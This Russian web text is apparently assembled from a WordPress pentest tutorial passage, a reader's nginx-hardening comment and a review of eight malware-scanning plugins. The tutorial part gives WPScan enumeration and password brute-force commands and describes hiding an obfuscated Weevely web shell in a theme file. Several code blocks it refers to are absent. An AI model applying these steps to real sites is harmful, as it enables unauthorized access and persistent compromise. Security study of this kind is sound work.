— модуль для определения имени пользователя auxiliary/scanner/http/wordpress_login_enum.

— перечисление установленных плагинов: wpscan —url www.exmple.com —enumerate p;
— перечисление установленных тем: wpscan —url www.exmple.com —enumerate t;
— перечисление установленного timthumbs: wpscan —url www.example.com —enumerate tt;
— определение имени пользователя: wpscan —url www.example.com —enumerate u;
— подбор пароля по словарю для пользователя admin: wpscan —url www.example.com —wordlist wordlist.txt —username admin;
— подбор пароля с использованием связки имя пользователя / пароль с числом потоков, равным 50: wpscan —url www.example.com —wordlist wordlist.txt —threads 50.

Определение установленных компонентов

Теперь давай соберем информацию об установленных плагинах и темах независимо от того, активированы они или нет. Прежде всего такую информацию можно выудить из исходного кода HTML-страницы, например по JavaScript-ссылкам, из комментариев и ресурсов типа CSS, которые подгружаются на страницу. Это самый простой способ получения информации об установленных компонентах. Например, строчки ниже указывают на используемую тему twentyeleven:

Далее, HTTP-заголовки, такие как X-Powered-By, могут указывать на наличие плагина (например, на плагин W3 Total Cache).
Так как информация о плагинах не всегда отображается в исходном коде HTML-страницы, то обнаружить установленные компоненты можно с помощью утилиты WPScan (см. врезку). Только не забывай, что перебор путей плагинов зафиксируется в логах веб-сервера.
Получив данные об установленных компонентах, уже можно приступать к поиску уязвимостей своими силами либо найти общедоступные эксплойты на ресурсах типа rapid7 или exploit-db.

Определение имени пользователей

По умолчанию в WordPress каждому пользователю присваивается уникальный идентификатор, представленный в виде числа: example.com/?author=1. Перебирая числа, ты и определишь имена пользователей сайта. Учетная запись администратора admin, которая создается в процессе установки WordPress, идет под номером 1, поэтому в качестве защитной меры рекомендуется ее удалить.

Брутфорс wp-login

Рис. 3. Ошибки при аутентификации пользователя

Зная имя пользователя, можно попробовать подобрать пароль к панели администрирования. Форма авторизации WordPress на странице wp-login.php весьма информативна (рис. 3), особенно для злоумышленника: при вводе неправильных данных появляются подсказки о неверном имени пользователя или пароле для конкретного пользователя. Разработчикам известно о данной особенности, но ее решили оставить, так как подобные сообщения удобны для пользователей, которые могли забыть свой логин и/или пароль. Проблему подбора пароля можно решить, используя стойкий пароль, состоящий из двенадцати и более символов и включающий буквы верхнего и нижнего регистра, числа и спецсимволы. Или же, например, при помощи плагина Login LockDown.

Security-плагины для WordPress

— Login LockDown — ограничивает количество неудачных попыток авторизации;
— Revisium WordPress Theme Checker — ищет типичные вредоносные фрагменты в темах WordPress;
— Sucuri Security — проводит мониторинг и обнаружение вредоносного кода;
— iThemes Security (бывший Better WP Security) — многофункциональный плагин для защиты WordPress;
— BackUpWordPress — делает резервное копирование файлов и БД;
— Google Captcha (reCAPTCHA) — устанавливает капчу при регистрации, авторизации, восстановлении паролей и в форме комментариев.

Заливаем Shell

После того как мы сбрутили пароль, ничто не мешает залить шелл на скомпрометированный веб-ресурс. Для этих целей вполне сгодится фреймворк Weevely, который позволяет генерировать шелл в обфусцированном виде, что делает его обнаружение довольно сложным. Чтобы не вызывать подозрения, полученный код можно вставить в любой файл темы (например, в index.php) через редактор темы консоли WordPress. После чего с помощью того же Weevely можно подключиться к машине жертвы и вызывать различные команды:

Подключаем .htaccess

Для запрета доступа к чувствительной информации лучше воспользоваться файлом .htaccess — это файл конфигурации, используемый в Apache Web Server. Рассмотрим возможности этого файла с точки зрения безопасности. С его помощью можно: запретить доступ к директориям и файлам, заблокировать различные SQL-инъекции и вредоносные скрипты. Для этого стандартный файл .htaccess для CMS WordPress 4.1 нужно немного расширить. Чтобы закрыть список файлов и папок, добавляем:

Собственно, если у вас php5-fpm+nginx, то как минимум:

  1. закрываем несчастный xmlrpc.php
  2. вешаем на wp-admin auth от nginx’а или делаем блог «только для себя»(чтобы не было других писателей)
  3. отключает autoindex для папок
  4. вводим фильтрацию args снова в nginx
  5. делаем фильтр для wp-login.php только для ввода пароля, чтобы смотреть защищенные статьи.

и/или во втором случае

5) символическая ссылка на wp-login.php. К примеру, как «wp-postpass.php».

В итоге люди смогут ввести пароль к публикации, да и только.

Я когда себе ставил, опубликовал на хабре свои шаги.

Как найти вредоносный код на сайте WordPress – 8 способов

WordPress – одна из самых популярных систем управления контентом (CMS), которую можно использовать как для ведения блога, так и для создания корпоративного сайта или открытия полноценного интернет-магазина. Для нее создаются плагины и темы, из которых можно выбрать что-то интересное. Некоторые из них бесплатные, а за некоторые придется заплатить. Так вот, чаще всего бесплатные подвержены различного рода уязвимость. Например, создатели таким тем и плагинов могут умышленно вносить в них вредоносный код для собственной выгоды. В лучшем случае это будут скрытые бэклинки, которые ведут на их сайты. При этом обычный пользователь не будет даже подозревать об этом. Наши читатели часто спрашивают у нас: «Возможно ли и как найти вредоносный код на сайте WordPress?».

Конечно, возможно! И сделать это довольно просто. Для сканирования сайта Вордпресс на вредоносный или нежелательный код создаются бесплатные и премиум (платные) инструменты. Выполнять регулярные проверки своего веб-ресурса, сканируя его на присутствие потенциально вредоносного кода, не только полезно, но и крайне необходимо. Я расскажу вам о нескольких вариантах, с помощью которых можно быстро и без особых сложностей осуществлять такие проверки.

В статье я собрал восемь лучших инструментов, которые помогут вам разобраться с вредоносным кодом в вашем шаблоне или на сайте на базе Вордпресса. Кстати, если помните, в прошлом месяце я уже рассказывал вам про плагины для защиты сайтов WordPress. Прочтите – вам будет не менее интересно.

Как найти вредоносный код на сайте WordPress – 8 способов

WP Anti Hack File Monitor

Этот простой плагин позволит защитить сайт от хакеров, которые могут попытаться изменить ваш код для выполнения злонамеренных действий. Это может быть как добавление бэклинков, так и отправка с вашего сайта спама. Изменяя файлы WordPress, они позволяют сделать все так, чтобы их действия осуществлялись в фоновом режиме. То есть незаметно для пользователя. Именно поэтому вам обязательно нужен инструмент для мониторинга файлов.

Этот инструмент представляет собой скрипт, способный вычислять любые изменения в файле, а также фиксировать удаление старых и создание новых файлов. В него встроено три ключевых компонента, которые помогут найти вредоносный код на сайте WordPress: функция создания копий файлов, мониторинга и уведомления.

Благодаря созданию копий файлов вы сможете откатиться к предыдущим версиям файлов. Удобный компаратор файлов позволит определить какие строки были изменены и каким образом. Это позволит вам не заходить на FTP. Уведомления можно отправлять по смс или на e-mail. Для отправки SMS-сообщений используется Twilio API. Но не волнуйтесь – вас не будут спамить сообщениями. Для каждого изменения файла будет отправляться строго одно уведомление. При необходимости можно выставить ограничение на количество отправляемых сообщений в день.

Если вам не нужно осуществлять мониторинг определенных компонентов своего сайта (например, загруженных файлов или конкретных плагинов), любые файлы и каталоги можно легко исключить из списка для проверки.

Выберите одно из лучших решений для WordPress, чтобы уверенно защитить свой сайт.

Theme Authenticity Checker

TAC – это плагин, позволяющий проверять source-файл всех установленных и используемых шаблонов на присутствие «плохого» кода, в частности на наличие ссылок и Base64-кодов, спрятанных в футере. При их обнаружении инструмент показывает путь к шаблону, номер нужной строки и конкретный фрагмент «сомнительного» кода. С этим плагином администратору WordPress будет проще работать уже непосредственно с куском подозрительного кода.
Плагин доступен в директории WordPress. Имеет неплохой рейтинг и 80 тысяч скачиваний.

WordPress вредоносный код: Как избавиться от нежелательных угроз?

Sucuri Security

Пожалуй, довольно сложно найти более известную систему безопасности, чем Sucuri. Она себя зарекомендовала, как один из продвинутых и популярных плагинов для обеспечения безопасности и защиты WordPress и проверки на вредоносное ПО. Ключевые функции системы это мониторинг файлов, загружаемых на сайт, контроль «черного списка» и оповещения безопасности. У Sucuri даже есть специальный инструмент для удаленной проверки на вредоносный код.

Особую ценность представляет премиум версия. После установки система автоматически включает защиту и осуществляет мониторинг сайта и защиту от любых угроз в режиме 24/7. Она контролирует и проверяет любые действия, происходящие на сайте, чтобы вовремя отслеживать появление неприятностей. Если у Sucuri есть какие-то подозрения, она блокирует конкретный IP, откуда идет угроза. Если происходят уже критические ситуации, плагин способен отправлять оповещения. Еще одна полезная вещь, которая есть в этой системе, это услуга по чистке сайта от вредоносного кода, но для платной версии она уже входит в стоимость. Так что никаких дополнительных затрат у вас не будет, независимо от размера сайта.

В плагине также есть мощное дополнение с файрволом, которое покупается отдельно и позволит сделать ваш сайт еще более безопасным.

Услугами Sucuri пользуются различные категории пользователей, в том числе и такие серьезные бренды и компании, как CNN и TechCrunch. Эти ребята знают, что делают. К тому же, они на рынке уже очень давно, поэтому им можно доверять.

Anti-Malware

Это плагин на Вордпрессе, который можно использовать для выполнения проверки и для устранения нежелательных угроз, вирусов и других всевозможных вредоносных объектов. Особенными возможностями плагина являются полное и ускоренное сканирование, а также удаление так называемых «знакомых» угроз в автоматическом режиме. Сканирование можно при необходимости настроить. Бесплатная регистрация доступна на сайте производителя.

Если вам не хочется иметь дело со скриптами, которые выполняют обновление плагина, обращаясь к сайту и предоставляя при этом информацию о вашем местоположении, тогда к этому варианту стоит подходить с осторожностью.

Как найти вредоносный код на сайте WordPress и как удалить вредоносный код с сайта WordPress

Quttera Web Malware Scanner

Этот премиум плагин помогает сканировать сайт, обеспечивая уверенную защиту от инъекций «плохого» кода и различного рода угроз и вирусов. В нем заложены отличные функции, а именно сканирование и нахождение незнакомых хакерских программ, отслеживание статусов в так называемом «black list», мощный движок для выполнения сканирования с интегрированным AI-интеллектом, отслеживание исходящих линков и так далее.

С free-версией можно реализовать поиск нежелательного кода, а другие услуги, такие как очистка от «плохого» кода, исключение из черного списка и высококлассная поддержка обойдутся уже в 119$ в год (за один домен) и выше.

Wordfence

Хотите защититься от киберугроз и быстро находить вредоносный код на сайте WordPress? Тогда вам стоит присмотреться к этому плагину, о котором мы уже упоминали в обзоре премиум плагинов для защиты на WordPress.

Плагин обеспечивает уверенную защиту от «знакомых» ему взломщиков в режиме real-time, предоставляет возможность двухфакторной аутентификации, блокировки целой вредоносной сети, а также возможность сканирования на использование встроенных инструментов обхода системы защиты и осуществления несанкционированного доступа (бэкдоров). Вышеупомянутые услуги доступны бесплатно, но есть и более расширенные возможности, за которые придется выложиться от 99$ за год.

Как найти и устранить вредоносный код на сайте WordPress?

AntiVirus for WordPress

Несложный в освоении и работе плагин, с которым выполнять сканирование темы WordPress, выбранной и используемой для сайта, на присутствие нежелательного кода будет проще простого. С ним вам будет доступна возможность получать оповещения о найденных вирусах через админ-панель. В него встроена функция ежедневного сканирования, с помощью которой можно получать уведомления о подозрительных событиях на электронную почту. Познакомьтесь с возможностями этого плагина, нажав на кнопку ниже.

Super Security

Этот плагин предоставит вам комплексную систему защиты WordPress со встроенным сканером файлов темы, который сравнивает результаты с обновляемым RSS-списком известных проблем WordPress. Базовая задача этого плагина – защита сайта от вирусов и злонамеренных атак путем сканирования, резервного копирования и проверки трафика.

В плагине есть специальная панель cPanel, в которой можно осуществлять изменения базы данных, выполнять резервное копирование базы данных, папок и установленной WordPress, и настраивать пермиссии для файлов и папок. Также вам будут доступны уведомления безопасности и возможность получения статистики с сервера. Еще есть поддержка «белого» списка и функция «Google Safe Browsing» для мониторинга вредоносных программ и фишинга.

Super Security совместим с системой для получения статистики о трафике в режиме «real time» Easy Stats Pro и инструментом для сканирования файлов и папок на вирусы и наличие вредоносного кода WP Antivirus, который был представлен позицией выше.

Плагин отмечен многими пользователями Sucuri, как такой, которому стоит доверять. Если вам необходимо достойное решение, чтобы обезопасить свой сайт, подумайте над тем, чтобы выбрать Super Security.

Теперь вы знаете, как найти вредоносный код на сайте WordPress, как от него избавиться и самое главное – теперь вы подберете для себя такое решение, которое подойдет под ваши требования и цели. Если у вас возникнут какие-либо вопросы, обязательно нам напишите в комментариях.

Добавить комментарий